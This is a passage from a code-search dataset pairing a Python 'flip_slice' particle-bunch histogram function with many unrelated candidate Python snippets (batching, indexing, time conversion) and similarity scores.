T_idxs[T_idxs >= t - b] += min(t, b) + f\n if self.rnn_state_interval > 0: # Some rnn states stored; only sample those.\n T_idxs = (T_idxs // self.rnn_state_interval) * \\\n self.rnn_state_interval\n B_idxs = np.random.randint(low=0, high=self.B, size=(batch_B,))\n return T_idxs, B_idxs", "def indices(self):\n _indices = []\n for h in self.miller.indices():\n _indices.append(self.indices_hkl(*h)[0])\n return _indices", "def spit(self):\n idxs = np.arange(self.total_tuples)\n return [self.recurse_index_state(copy.deepcopy(self.state_buffer), idxs), self.recurse_index_state(copy.deepcopy(self.state2_buffer), idxs), self.action_buffer[idxs], self.adv_buffer[idxs], \n self.rtg_buffer[idxs], self.logp_buffer[idxs], self.valid_actions_buffer[idxs], self.rew_buffer[idxs], self.done_buffer[idxs]]", "def test_batch_idx(self) -> int:\n return self._test_batch_idx", "def get_next_bin_node(self):\n # Implemented from template for osid.resource.ResourceList.get_next_resource\n return self.next()", "def next_index(state):\n node = state\n for key in (\"layers\", \"index\"):\n node = node.get(key, {})\n indices = [key for key in node.keys()]\n if len(indices) == 0:\n return 0\n else:\n return max(indices) + 1", "def get_main_points(neuron):\n (branch_index,) = np.where(neuron.branch_order[neuron.n_soma:] == 2)\n (endpoint_index,) = np.where(neuron.branch_order[neuron.n_soma:] == 0)\n selected_index = np.union1d(branch_index + neuron.n_soma,\n endpoint_index + neuron.n_soma)\n selected_index = np.append(range(neuron.n_soma), selected_index)\n return selected_index", "def next_position(self) -> List[int]:\n return self.__path_to_end()[1]", "def get_final_pruned_indices(self):\n return self.final_pruned_indices", "def get_main_branch_indices(self):\n\n assert self.halt is not None\n prog_main_index = self.halt_index\n prog_main_indices = self.halt.prop(\n 'progenitor.main.indices', self.halt_index)\n self.main_branch_indices = prog_main_indices\n return prog_main_indices", "def get_minibatch(self, prioritized=True):\n if prioritized:\n sampling_priorities = np.abs(self.mem_error) + 1e-9\n else:\n sampling_priorities = np.ones(shape=self.mem_error.shape)\n sampling_probs = sampling_priorities / np.sum(sampling_priorities)\n sample_indices = [x for x in range(self.mem_state.shape[0])]\n choice_indices = np.random.choice(sample_indices,\n min(self.mem_state.shape[0],\n self.batch_size),\n p=np.squeeze(sampling_probs),\n replace=False\n )\n states = self.mem_state[choice_indices]\n rewards = self.mem_reward[choice_indices]\n sucstates = self.mem_sucstate[choice_indices]\n episode_active = self.mem_episode_active[choice_indices]\n\n return choice_indices, states, rewards, sucstates, episode_active", "def get_batch(self):\n self._next_minibatch()\n scans = np.empty((self.batch_size, 2, RANGE_BINS, HEADING_BINS), dtype=np.float32)\n targets = np.empty((self.batch_size, 1, RANGE_BINS, HEADING_BINS), dtype=np.float32)\n features = np.empty((self.batch_size, 2048, 3, 12), dtype=np.float32)\n\n long_ids = []\n assert len(self.batch) == self.batch_size\n for n,item in enumerate(self.batch):\n long_ids.append(item['scan'] + \"_\" + item['image_id'])\n # Select one feature if there are multiple versions\n selected_features = random.choice(item['features'])\n\n if self.augment:\n # random rotation by a 30 degree increment\n rotation = random.randint(0,12)\n ix = int(len(item['laser'])/12*rotation)\n laser = np.roll(item['laser'], ix) # end rolls around to start\n tgt_heading = np.array([normalize_angle(h + (math.pi/6)*rotation) for h in item['target_heading']])\n feat = np.roll(selected_features, rotation, axis=1)\n else:\n laser = np.array(item['laser'], copy=True)\n tgt_heading = item['target_heading']\n feat = selected_features\n\n # missing part of scan\n length = len(laser)\n miss_start = random.randint(0, length)\n miss_end = miss_start + int((360-self.laser_fov_deg)/360 * length)\n laser[miss_start:miss_end] = -1\n if miss_end >= length:\n laser[:miss_end-length] = -1\n\n # dropout. Unlike conventional dropout, this occurs at both train and test time and is \n # considered to represent missing return values in the laser scan.\n drop = np.random.random_sample((len(laser),))\n laser[drop < self.dropout] = -1 # Indicates missing return.\n\n scans[n, 1, :, :] = radial_occupancy(laser).transpose((2,0,1))\n # add a range indicating channel\n r = np.linspace(-0.5, 0.5, num=RANGE_BINS)\n scans[:,0,:,:] = np.expand_dims(np.expand_dims(r, axis=0), axis=2)\n targets[n, :, :, :] = radial_target(tgt_heading, item['target_range']).transpose((2,0,1))\n features[n, :, :, :] = feat.transpose((2,0,1))\n # features = np.zeros_like(features) # How does it work without image features?\n # scans = np.zeros_like(scans) # How does it work with only image features?\n # Normalize targets into a probability dist\n targets /= targets.reshape(targets.shape[0], -1).sum(axis=1).reshape(-1, 1, 1, 1)\n return scans, features, targets, long_ids", "def get_indexes(self, dataset: BaseDataset) -> int:\n\n index = [np.random.randint(0, len(dataset)) for _ in range(1)]\n\n return index", "def get_resource_index(self):\n result = -1\n max_sleep_time = self.time_window\n with self._lock:\n while result == -1:\n for i in range(0, self.num_keys):\n curr_sleep_time = max((self.timers[i][0] + self.time_window) - time.time(), 0)\n\n max_sleep_time = min(max_sleep_time, curr_sleep_time)\n\n if self.timers[i][1] >= self.window_limit and self.timers[i][0] + self.time_window < time.time():\n self.timers[i][0] = 0\n self.timers[i][1] = 0\n\n if self.timers[i][1] < self.window_limit:\n result = i\n break\n\n if result == -1: # case when all streams are rate limited\n # logging.warning('sleeping for %d seconds.' % max_sleep_time)\n # time.sleep(max_sleep_time)\n return -1 * max_sleep_time\n\n if self.timers[result][0] == 0:\n self.timers[result][0] = time.time()\n\n self.timers[result][1] += 1\n\n return result", "def getBinIndices(self, linear_index):\n return linear_index / self.magic_array % self.nbins_across_dims", "def _get_index(self):\n\n return self.index\n\n # to avoid having differences bigger than 2pi", "def _shuffle_roidb_inds(self):\r\n if True: #cfg.TRAIN.ASPECT_GROUPING:\r\n widths = np.array([r['width'] for r in self._roidb])\r\n heights = np.array([r['height'] for r in self._roidb])\r\n horz = (widths >= heights)\r\n vert = np.logical_not(horz)\r\n horz_inds = np.where(horz)[0]\r\n vert_inds = np.where(vert)[0]\r\n\r\n horz_inds = np.random.permutation(horz_inds)\r\n vert_inds = np.random.permutation(vert_inds)\r\n mb = 2 #cfg.TRAIN.IMS_PER_BATCH\r\n horz_inds = horz_inds[:(len(horz_inds) // mb) * mb]\r\n vert_inds = vert_inds[:(len(vert_inds) // mb) * mb]\r\n inds = np.hstack((horz_inds, vert_inds))\r\n\r\n inds = np.reshape(inds, (-1, mb))\r\n row_perm = np.random.permutation(np.arange(inds.shape[0]))\r\n inds = np.reshape(inds[row_perm, :], (-1, ))\r\n self._perm = inds\r\n else:\r\n self._perm = np.random.permutation(np.arange(len(self._roidb)))\r\n self._perm = deque(self._perm)\r\n self._cur = 0", "def compute_batch_indices(batch_size: int, beam_size: int) ->torch.LongTensor:\n batch_pos = torch.arange(batch_size)\n batch_pos = batch_pos.view(-1, 1).expand(batch_size, beam_size)\n return batch_pos", "def next(self) -> int:\n self.index += 1\n return self.nodes_sorted[self.index]", "def get_batch_idx(self, split):\r\n start = self.idx_in_epoch[split]\r\n\r\n # Is epoch finished?\r\n if self.idx_in_epoch[split] == self.nsamples[split]:\r\n start = 0\r\n self.idx_in_epoch[split] = 0\r\n\r\n # shuffle training set at start of epoch\r\n if start == 0 and split == 'train':\r\n self.shuffle_train()\r\n\r\n # Set end of batch\r\n self.idx_in_epoch[split] += self.batch_size\r\n if self.idx_in_epoch[split] > self.nsamples[split]:\r\n self.idx_in_epoch[split] = self.nsamples[split]\r\n end = self.idx_in_epoch[split]\r\n\r\n return self.idx[split][start:end]", "def indices(self):\n\n # We used lookup tables here. Read more about other methods here:\n # https://chessprogramming.wikispaces.com/Bitboard+Serialization\n\n if self.num == 0:\n return []\n\n bits = []\n\n for i in [0, 1, 2, 3, 4, 5, 6, 7]:\n row = (self.num >> UINT64_PADDING[i]) & EIGHT_ONES\n indices = row_to_indices[row]\n for index in indices:\n bits.append(index + i*8)\n\n return bits", "def get_new_images_range(self):\n if not self._buffers:\n return None\n acq_status=self.get_acquisition_status()\n if acq_status.last_read==acq_status.acquired:\n return None\n last_read=max(acq_status.last_read,acq_status.acquired-len(self._buffers))\n return last_read,acq_status.acquired-1", "def random_neighbors(self) -> int:\n return self.__random_neighbors", "def next_node_id(self) -> int:\n i = 1\n while True:\n if i not in self.session.nodes:\n break\n i += 1\n return i", "def __iter__(self):\n worker_info = torch.utils.data.get_worker_info()\n num_batches = len(self.coords_batcher)\n if worker_info is None:\n # In single-processing mode\n start, end = 0, num_batches\n else:\n worker_id = worker_info.id\n num_workers = worker_info.num_workers\n shard_size = int(np.ceil(num_batches / num_workers))\n start = shard_size * worker_id\n end = min(start + shard_size, num_batches)\n return (self.get_batch(i) for i in range(start, end))", "def NewStartingIndex(self) -> int:", "def get_test_index():\n return list(range(305, 435))", "def _get_child_indices(self, current_index: int) -> List[int]:\n multiplier = current_index * 2\n left_index = multiplier + 1\n right_index = multiplier + 2\n\n return [left_index, right_index]", "def _compute_indices(self):\n self.indices = np.arange(len(self.im_filenames))\n np.random.shuffle(self.indices)", "def next(self) -> int:\n self.idx += 1\n return self.m[self.idx]", "def next(self) -> int:\n self.idx += 1\n return self.m[self.idx]", "def get_vehicle_start_index(self):\n return [vehicle.start_index for vehicle in self.vehicles]", "def get_instance_idx(self, idx):\n obj_idx = 0\n while idx >= 0:\n idx -= self.num_per_instance_observations[obj_idx]\n obj_idx += 1\n return obj_idx - 1, int(idx + self.num_per_instance_observations[obj_idx - 1])", "def get_instance_idx(self, idx):\n obj_idx = 0\n while idx >= 0:\n idx -= self.num_per_instance_observations[obj_idx]\n obj_idx += 1\n return obj_idx - 1, int(idx + self.num_per_instance_observations[obj_idx - 1])", "def get_instance_idx(self, idx):\n obj_idx = 0\n while idx >= 0:\n idx -= self.num_per_instance_observations[obj_idx]\n obj_idx += 1\n return obj_idx - 1, int(idx + self.num_per_instance_observations[obj_idx - 1])", "def GetNext(self):\n if self.ids:\n return self.ids.pop()\n self.next_idx += 1\n return self.next_idx", "def get_index(self):\n\t\treturn call_sdk_function('PrlBootDev_GetIndex', self.handle)", "def main_rep_idxs(self):\n\n if '{}/{}'.format(SETTINGS, MAIN_REP_IDXS) in self.h5:\n return self.h5['{}/{}'.format(SETTINGS, MAIN_REP_IDXS)][:]\n else:\n return None", "def test_minibatches(self):\n batch_size = self.params['batch_size']\n start_index = 0\n while start_index + batch_size < 500:\n end_index = start_index + batch_size\n yield self.input[start_index:end_index], self.y[start_index:end_index]\n start_index = end_index", "def indices_of_split(self, split_name='train'):\n return self.indices_of('split', split_name)", "def available_images_index(self):\n first = ct.c_long()\n last = ct.c_long()\n self.lib.GetNumberAvailableImages(ct.pointer(first), ct.pointer(last))\n\n return (first.value, last.value)", "def get_rnn_cells(self):\n return [self.rnn]", "def mainIndices(self):\n return self.i1, self.i2", "def valid_minibatches(self):\n batch_size = self.params['batch_size']\n start_index = 0\n while start_index + batch_size < 500:\n end_index = start_index + batch_size\n yield self.input[start_index:end_index], self.y[start_index:end_index]\n start_index = end_index" ]
[ "0.76239616", "0.745489", "0.7413968", "0.70359194", "0.6630719", "0.65478575", "0.6362661", "0.6330628", "0.6231964", "0.6105139", "0.60316145", "0.5990063", "0.59887934", "0.5968671", "0.5885011", "0.58408743", "0.582455", "0.5802829", "0.57580876", "0.5756126", "0.5748933", "0.56911457", "0.56801367", "0.5666287", "0.5666216", "0.5591628", "0.5591628", "0.55514514", "0.55448", "0.55201316", "0.55193365", "0.5518828", "0.5511837", "0.54886395", "0.54758", "0.5452755", "0.54366", "0.5427121", "0.5425142", "0.5411513", "0.5411513", "0.53973407", "0.535786", "0.53570163", "0.53375524", "0.5336522", "0.5334523", "0.5325671", "0.5294226", "0.5283425", "0.5282946", "0.5268655", "0.52556384", "0.52538556", "0.52380854", "0.52273625", "0.52233255", "0.5223155", "0.5221936", "0.5221338", "0.52186036", "0.52064663", "0.5205493", "0.5204021", "0.52016264", "0.5195999", "0.51945823", "0.5184405", "0.51816624", "0.5171991", "0.51699924", "0.5165432", "0.516331", "0.516075", "0.516045", "0.5159515", "0.5159234", "0.51571006", "0.5151074", "0.5147259", "0.51445806", "0.51346755", "0.5131758", "0.51295483", "0.5119211", "0.5117242", "0.5117242", "0.51131475", "0.5111016", "0.5111016", "0.5111016", "0.51072437", "0.5102713", "0.5100025", "0.5099056", "0.50966513", "0.50936484", "0.50931436", "0.5092452", "0.5091979" ]
0.72795445
3
We use this function to flip the bunch in s and convert the information from time (t) to the longitudinal length along the bunch(s).
def flip_slice(t, bins=2944): s = constants.c*np.ravel((np.max(t)-t)) # Flip s s_sort_index = np.argsort(s) # Ascending order. plt.clf() hist_min = np.min(s) # hist_max = np.min(s)+(np.max(s)-np.min(s))*0.96 hist_max = np.min(s)+(np.max(s)-np.min(s))*0.99 hist, zplot, patches = plt.hist(s, bins,range = (hist_min, hist_max)) id_slices = [] for n in range(0, bins): num_begin = int(np.sum(hist[0:n])) num_end = int(np.sum(hist[0:n+1])) id_slices.append(s_sort_index[num_begin:num_end]) return id_slices, zplot, hist
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def MakeLongTime(t, N):\n dt=(t.max()-t.min())/(max(shape(t))-1)\n tout=arange(0,N,dtype='f')\n tout=tout*dt\n return tout", "def time_unwrap(val_timestamps):\n a=val_timestamps.shape[0]\n val_time =val_timestamps.astype('int64')\n for i in range(a-1):\n if val_time[i+1]-val_time[i]<-1*2**25:\n val_time[i+1:]+=2**26\n\n return(val_time)", "def get_times(ts_full, ts_system, len_state, sys_position, sys_length):\n ts = list(ts_full) + list(ts_system)\n subsystems = [[0, len_state]] * len(ts_full) + \\\n [[sys_position, sys_position + sys_length]] * len(ts_system)\n return ts, subsystems", "def tt(obs_time, *whatevers):\n n = whatevers[0].size\n return tuple(\n [obs_time[:n], ] +\n list(whatevers)\n )", "def _TIME2STEPS(time):\n return int(time*1000)", "def normalize_time(full_timestamps, half_timestamp):\n phases = (half_timestamp - full_timestamps[0]) / (full_timestamps[-1] - full_timestamps[0])\n return phases", "def flip_t_b(self, times: int):\n for i in range(0, times):\n self.tile_rows = self.tile_rows[::-1]", "def calc_tsunami(slip_result):\n gf = h5py.File('NA_CAS.hdf5', 'r')\n time_array = np.array(gf['time/timedata'])\n\n # dictionary for holding slip calculations\n scale_gf = []\n\n # declare empty array with max size\n ar_len = len(time_array)\n ar_width = get_array_size()\n\n tgf = np.zeros(shape=(ar_len, ar_width)) # tgf = tsunami green's function\n\n # loop over index adn slip value from slip array\n for i, slip in enumerate(slip_result):\n # print(i)\n # make sure slip is a float not string\n s = float(slip)\n\n # multiply slip by each subfault\n scale_gf.append(s * gf['GF/{:03}'.format(i)][:])\n\n # iterate over all the subfaults and add all subfaults together per site\n for sf in scale_gf:\n tgf += sf\n\n # return the slip_at_site array and the time array\n return (tgf, time_array)", "def tu_projection(s, t):\n N = int(log(len(s), 2))\n mask = sum(int(1 << j) for j in range(0, N-t))\n T = [\n [-1 for i in range(0, 2**t)]\n for j in range(0, 2**(N-t))\n ]\n U = [\n [-1 for j in range(0, 2**(N-t))]\n for i in range(0, 2**t)\n ]\n for j in range(0, 2**(N-t)):\n for i in range(0, 2**t):\n y = s[(j << t) | i]\n T[j][i] = y & mask\n U[i][j] = y >> t\n return T, U", "def convert_to_fixed_timesteps(trajectories, timestep_size=60):\n\n def time_to_timestep(row):\n h, m, s = map(int, row[\"Time\"].split(':'))\n timestep = round((h*3600+m*60+s)/timestep_size)\n return timestep\n\n for i, t in trajectories.items():\n t[\"Timestep\"] = t.apply(time_to_timestep, axis=1)\n t = t.drop_duplicates(\"Timestep\")\n t = t.set_index(\"Timestep\")\n trajectories[i] = t\n \n return trajectories", "def stabilize(td):\n\n def correct_saccade1(data):\n data.x -= np.rint(3.5 * data.ts / 105e3).astype(np.uint16)\n data.y -= np.rint(7 * data.ts / 105e3).astype(np.uint16)\n return data\n\n def correct_saccade2(data):\n data.x -= np.rint(3.5 + 3.5 * (data.ts - 105e3) / 105e3).astype(\n np.uint16)\n data.y -= np.rint(7 - 7 * (data.ts - 105e3) / 105e3).astype(np.uint16)\n return data\n\n def correct_saccade3(data):\n data.x -= np.rint(7 - 7 * (data.ts - 210e3) / 105e3).astype(np.uint16)\n return data\n\n copy = np.piecewise(td.data,\n [td.data.ts <= 105e3,\n (td.data.ts > 105e3) & (td.data.ts <= 210e3),\n (td.data.ts > 210e3)],\n [correct_saccade1, correct_saccade2,\n correct_saccade3]).view(np.recarray)\n\n # after saccades, we might end up with invalid x and y values, have to\n # correct these\n x_vals = copy.x\n y_vals = copy.y\n copy.x = np.piecewise(x_vals,\n [x_vals >= 65000,\n (x_vals < 65000) & (x_vals >= td.width),\n x_vals < td.width],\n [0, td.width - 1, lambda x: x])\n copy.y = np.piecewise(y_vals,\n [y_vals >= 65000,\n (y_vals < 65000) & (y_vals >= td.height),\n y_vals < td.height],\n [0, td.height - 1, lambda y: y])\n\n return copy", "def hypno2time(hypno, seconds_per_epoch=1):\n hypno = np.repeat(hypno, seconds_per_epoch)\n s = '*Duration_sec {}\\n'.format(len(hypno))\n stages = ['Wake', 'N1', 'N2', 'N3', 'REM', 'Art']\n d = dict(enumerate(stages))\n hypno_str = [d[h] for h in hypno]\n \n last_stage=hypno_str[0]\n \n for second, stage in enumerate(hypno_str):\n if stage!=last_stage:\n s += '{}\\t{}\\n'.format(last_stage, second)\n last_stage=stage\n s += '{}\\t{}\\n'.format(stage, second+1)\n return s", "def inverse_compress(self, pieces, start):\n \n time_series = [start]\n # stitch linear piece onto last\n for j in range(0, len(pieces)):\n x = np.arange(0,pieces[j,0]+1)/(pieces[j,0])*pieces[j,1]\n #print(x)\n y = time_series[-1] + x\n time_series = time_series + y[1:].tolist()\n\n return time_series", "def inverse_compress(self, pieces, start):\n \n time_series = [start]\n # stitch linear piece onto last\n for j in range(0, len(pieces)):\n x = np.arange(0,pieces[j,0]+1)/(pieces[j,0])*pieces[j,1]\n #print(x)\n y = time_series[-1] + x\n time_series = time_series + y[1:].tolist()\n\n return time_series", "def seg_times_to_trans_times(seg_times):\n trans_times = np.r_[0, np.cumsum(seg_times)]\n return trans_times", "def reverseString(s):\n for i in range(len(s)//2):\n t = s[i]\n s[i] = s[len(s)-i-1]\n s[len(s)-i-1] = t", "def duration_from_seconds(s):\n s = s\n m, s = divmod(s, 60)\n h, m = divmod(m, 60)\n d, h = divmod(h, 24)\n TIMELAPSED = f\"{d:03.0f}:{h:02.0f}:{m:02.0f}:{s:02.0f}\"\n return TIMELAPSED", "def timeStamp2LST(self, t):\n if isinstance(t, list):\n t = np.array(t)\n return self.lst_start + t*1e-6/(3590.)", "def _process_data(data):\n for array in data:\n # Check if time is inverted. If so, reverse array while keeping the time/data structure.\n if array and len(array) > 2 and array[0] > array[2]:\n buff_1 = array[::2][::-1]\n buff_2 = array[1::2][::-1]\n array[::2] = buff_1\n array[1::2] = buff_2\n return data", "def lpol_sdiff(s):\n return [1] + [0] * (s - 1) + [-1]", "def de_flip(n):\n start = '0'*(n//2) + '1' + '0'*(n//2)\n L = [[start]]\n L_tmp = []\n collect = []\n\n \n print(L)\n\n length = 1\n \n while(True):\n flag_cycle = -1\n count = 0\n for next_list in L:\n next_0 = next_list[-1][1:] + '0'\n next_1 = next_list[-1][1:] + '1'\n # 마지막 문자에서 0과 1을 추가한다.\n\n # 사이클완성!\n if next_0 == start:\n collect.append(next_list)\n flag_cycle = len(next_list)\n count += 1\n continue\n\n # 리스트에서 플립핑 검사\n if next_0 not in next_list and next_0[::-1] not in next_list:\n copy = next_list.copy()\n copy.append(next_0)\n L_tmp.append(copy)\n \n if next_1 not in next_list and next_1[::-1] not in next_list:\n copy = next_list.copy()\n copy.append(next_1)\n L_tmp.append(copy)\n \n if len(L_tmp) == 0:\n break\n L = L_tmp.copy()\n L_tmp = []\n\n print(\"length : {0}, flag_cycle : {1}, count : {2}\".format(length,flag_cycle,count))\n length += 1\n \n return collect", "def prepare_ts(s):\n s = s.rename_axis('ds')\n out = s.rename('y').reset_index()\n return out", "def flip_l_r(self, times: int):\n for i in range(0, times):\n new_rows = []\n for row in self.tile_rows:\n new_rows.append(row[::-1])\n\n self.tile_rows = new_rows", "def fashionably_late(arrivals, name=''):\n\n # arrival_wo_Last = arrivals[:len(arrivals)-1]\n half = (len(arrivals)//2)+1\n arrivals.pop()\n # return half\n return arrivals[half:]", "def litres(time):\n return int(time / 2)", "def dspmt(t):\n t = np.asarray(t)\n return spmt(t) - spmt(t - 1)", "def bintime(s,tunit,timebin,nanval): \r\n #same functionality can make use of pandas.cut\r\n #but have to convert column to seconds and bin accordingly i.e:\r\n #pd.cut(test.dt.seconds,[i*3600 for i in [1,2,3,4,5]],labels=[1,2,3,4])\r\n #and use pd.fillna(lastbin) for stuff outside bin\r\n #.cat.set_categories([0,1,2,3,4]).fillna(0)\r\n #test2['s_response_bin']=pd.cut(test2.s_to_first_response.dt.seconds,[i*3600 for i in [0,1,2,3,4]],labels=[1,2,3,4]).cat.set_categories([0,1,2,3,4]).fillna(0)\r\n #50% faster, but can't deal with values greater than last bin. Workaround- use an extremely large number ['0-1','1-2', '2-3','3-4','4-12','12-24','>24','UN'] \r\n '''\r\n tt.tic() \r\n test4=pd.cut(test2.s_to_last_closed.dt.total_seconds(),[i*3600 for i in [0,1,2,3,4,12,24,365*24]],labels=['0-1','1-2', '2-3','3-4','4-12','12-24','>24']).cat.add_categories(['UN']).fillna('UN')\r\n \r\n tt.toc()\r\n \r\n #del test2['s_response_bin']\r\n tt.tic()\r\n test3=test2.s_to_last_closed.apply(lambda s: af.bintime(s,'h',resolvebinlist,0))\r\n tt.toc()\r\n test5=pd.DataFrame([test3,test4]).transpose()\r\n '''\r\n for i in timebin[0:-1]:\r\n if s == 'None' or pd.isnull(s):#type(s)==pd.tslib.NaTType:\r\n binval=nanval\r\n break\r\n if s <= np.timedelta64(i, tunit):#timeunits=s / np.timedelta64(1, unit)\r\n binval=i\r\n break\r\n else: \r\n binval= timebin[-1]\r\n return binval", "def unixTimeConv(timestamps):\n\n\tnewTime = str(datetime.datetime.fromtimestamp(int(timestamps)))\n\tyearDate,timeT = newTime.split(' ')\n\tyear,month,day = str(yearDate).split('-')\n\thour,minutes,sec = timeT.split(':')\n\tsplitTimes = (year,month,day,hour,minutes,sec,timestamps)\n\n\treturn(splitTimes)", "def et(obs_time, *whatevers):\n obs_time = np.asarray(obs_time)\n n_time = obs_time.size\n n_obs = np.amax([w.size for w in whatevers])\n if n_obs > n_time:\n delta_t = obs_time[-1] - obs_time[-2]\n shortfall = n_obs-n_time\n obs_time = np.concatenate((\n obs_time,\n np.linspace(\n obs_time[-1] + delta_t,\n obs_time[-1] + delta_t * shortfall,\n shortfall,\n endpoint=True\n ),\n ))\n\n return tuple((obs_time,) + whatevers)", "def pmsdnut2(time):\n if time.size == 1:\n return iers.pmsdnut2(time.tt.mjd)\n else:\n # Only loop over unique epochs\n _, idx, r_idx = np.unique(np.asarray(time), return_index=True, return_inverse=True)\n return np.array([iers.pmsdnut2(t.tt.mjd) for t in time[idx]])[r_idx]", "def ns_tarray_to_sFlat(t_arr, DEPTH = 2, iftime = False):\n sflat = []\n tm, tm_max, dep = 0, 0, 0\n lis = t_arr.tolist()\n # print(\"tarr : \", t_arr)\n do = 1 if iftime else 0\n print(\"do : \", do)\n for i in range(t_arr.shape[0]):\n ctime, aflag = -1, False\n interv = 0\n sflat.append([])\n # sflat[i].append([0 for _ in range(DEPTH)])\n if iftime: \n abvp = [t_arr[0, 0, 3]]\n abvp.extend(list([0 for _ in range(DEPTH)]))\n else: abvp = [0 for _ in range(DEPTH)]\n sflat[i].append(abvp)\n tm, dep = -1, do # tm -1 initiator\n \n # print(\"sFlat -____________- : \", sflat[i][0])\n\n st_arr = sorted(lis[i], key=lambda x: x[0] if x[0] != 0 else sys.maxsize)\n\n t_arr = numpy.array([st_arr])\n\n for j in range(t_arr.shape[1]):\n if dep == DEPTH + do: \n dep = do\n if ctime == t_arr[i, j, 0] and dep == do: \n continue\n elif ctime != t_arr[i, j, 0]:\n\n if iftime: \n abvp= [t_arr[i, j, 3]]\n abvp.extend([0 for _ in range(DEPTH)])\n else: abvp= [0 for _ in range(DEPTH)]\n sflat[i].append(abvp)\n tm += 1\n dep = do\n if ctime + interv != t_arr[i, j, 0]:\n sflat[i][tm][1] = 0\n dep = do\n ctime += interv\n continue\n # print(\"DEP : \", dep, len(sflat[i][tm]), iftime)\n sflat[i][tm][dep] = int(t_arr[i, j, 1])\n ctime = t_arr[i, j, 0]\n interv = t_arr[i, j, 3]\n dep += 1\n \n tm_max = max([len(v) for v in sflat])\n\n #triming the array\n sflat_arr = numpy.zeros((t_arr.shape[0], tm_max + 1, DEPTH + do), dtype = 'int32') #because tm_max is zeo based indexing\n for i in range(sflat_arr.shape[0]):\n for j in range(len(sflat[i])):\n for k in range(sflat_arr.shape[2]):\n sflat_arr[i, j, k] = sflat[i][j][k]\n return sflat_arr", "def tilt(self) -> int:", "def eo(obs_time, *whatevers):\n obs_time = np.asarray(obs_time)\n n_time = obs_time.size\n new_whatevers = []\n for whatever in whatevers:\n whatever = np.asarray(whatever)\n n_obs = whatever.size\n if n_obs < n_time:\n whatever = np.concatenate((\n whatever,\n [whatever[-1]] * (n_time-n_obs)\n ))\n new_whatevers.append(whatever)\n return tuple([obs_time] + new_whatevers)", "def timing(t):\r\n if t < 1:\r\n power = int(np.log10(t))-1\r\n num = t/10**power\r\n if abs(power) < 10:\r\n return '{0:.1f}e-0{1:.0f}s'.format(num, abs(power))\r\n return '{0:.1f}e-{1:.0f}s'.format(num, abs(power))\r\n if t >= 1 and t < 60:\r\n return '{0:.1f}s'.format(t)\r\n if t >= 60 and t < 3600:\r\n minutes = int(t/60)\r\n seconds = t-(60*minutes)\r\n return '{0:.0f}m, {1:.1f}s'.format(minutes, seconds)\r\n if t >= 3600 and t < 86400:\r\n hours = int(t/3600)\r\n minutes = int((t-(3600*hours))/60)\r\n seconds = t-(3600*hours + 60*minutes)\r\n return '{0:.0f}h, {1:.0f}m, {2:.1f}s'.format(hours, minutes, seconds)\r\n if t >= 86400 and t < 31536000:\r\n days = int(t/86400)\r\n hours = int((t-(86400*days))/3600)\r\n minutes = int((t-(86400*days + 3600*hours))/60)\r\n seconds = t - (86400*days + 3600*hours + 60*minutes)\r\n return '{0:.0f}d, {1:.0f}h, {2:.0f}m, {3:.1f}s'.format(days, hours, minutes, seconds)\r\n if t >= 31536000:\r\n years = int(t/31536000)\r\n if years > 9999:\r\n years = t/31536000\r\n power = int(np.log10(years))\r\n num = years/10**power\r\n if abs(power) < 10:\r\n return '{0:.2f}e+0{1:.0f} years'.format(num, abs(power))\r\n return '{0:.2f}e+{1:.0f} years'.format(num, abs(power))\r\n days = int((t-(31536000*years))/86400)\r\n hours = int((t-(31536000*years + 86400*days))/3600)\r\n minutes = int((t-(31536000*years + 86400*days + 3600*hours))/60)\r\n seconds = t - (31536000*years + 86400*days + 3600*hours + 60*minutes)\r\n return '{0:.0f}y, {1:.0f}d, {2:.0f}h, {3:.0f}m, {4:.1f}s'.format(years, days, hours, minutes, seconds)", "def naked_twins(self,state:dict):\n for unit in self.unitlist:\n\n #find any twins in unit and save as counter object\n all_pairs = Counter([state[box] for box in unit if len(state[box])==2])\n twins = [key for key,val in all_pairs.items() if val == 2]\n\n #loop through twins and replace number in the other boxes\n for twin in twins:\n for num in twin:\n for box in unit:\n if twin != state[box]:\n self.assign_value(state,box,state[box].replace(num,''))\n \n return state", "def OPCtimetransform(data, to):\n \n remove_times = []\n outtimes = []\n times = {'ms':[],'SS':[],'MM':[],'HH':[]}\n\n for i in range(0, len(data)):\n times['HH'] = 0\n times['MM'] = 0\n times['SS'] = 0\n times['ms'] = 0\n\n item = data[i]\n \n try:\n if len(item.split('.')[1]) < 2:\n item += '0'\n except IndexError:\n item += '.00'\n if len(item) < 9:\n item = item.zfill(9)\n if int(item[:2]) > 23:\n item = '0' + item\n \n # remove items with extra zero (2319010.00 to 231910)\n if len(item) > 9:\n olditem = item\n newitem = item[:4] + item[5:]\n print( ('Repairing strange value %s into %s')%(olditem, newitem) )\n item = newitem\n else:\n pass\n try:\n md = dt.datetime.strptime(item, \"%H%M%S.%f\")\n \n # round off items which exceed 59 minutes or 59 seconds \n # (i.e. 146001 to 150001.)\n except ValueError:\n \n try:\n times['HH'] = int(item[0:2])\n times['MM'] = int(item[2:4])\n times['SS'] = int(item[4:6])\n times['ms'] = int(item[7:9])\n except ValueError:\n print(i, item)\n\n if times['SS'] > 59:\n times['MM'] += 1\n times['SS'] = 0\n if times['MM'] > 59:\n times['HH'] += 1\n times['MM'] = 0\n # discard items which exceed 23 hours\n if times['HH'] > 23:\n times['HH'] = 23\n print( ('resetting value %s')%(item) )\n \n\n md = dt.datetime(1900,1,1,times['HH'], times['MM'], times['SS']) \n\n \n outtimes.append( dt.datetime.strftime(md, to) )\n\n return outtimes", "def get_chop_times_indices(times, chop_length=180., chop_nsamp=None, strict=False, exit_on_error=False):\n\n n_times = len(times)\n\n try:\n data_type = times.dtype()\n except:\n data_type = np.float64\n\n if chop_nsamp: # compute chop based on number of samples\n n_chops = int(n_times // chop_nsamp)\n if n_chops == 0:\n n_chops = 1\n n_times_chop = chop_nsamp\n else: # compute chop based on duration given\n dt = times[1] - times[0] # time period between two time samples\n n_chops, t_rest = np.divmod(times[-1], chop_length)\n n_chops = int(n_chops)\n\n # chop duration in s\n if strict:\n # ToDo check for times[-1] < chop_length\n chop_len = chop_length\n else:\n chop_len = chop_length + t_rest // n_chops # add rest to chop_length\n\n msg1 = [\n \" -> number of chops : {}\".format(n_chops),\n \" -> calculated chop legth: {}\".format(chop_len),\n \" -> rest [s] : {}\".format(t_rest),\n \"-\" * 40,\n \" -> chop length : {}\".format(chop_length),\n \" -> numer of timepoints : {}\".format(n_times),\n \" -> strict : {}\".format(strict),\n \"-\" * 40,\n \" -> exit on error : 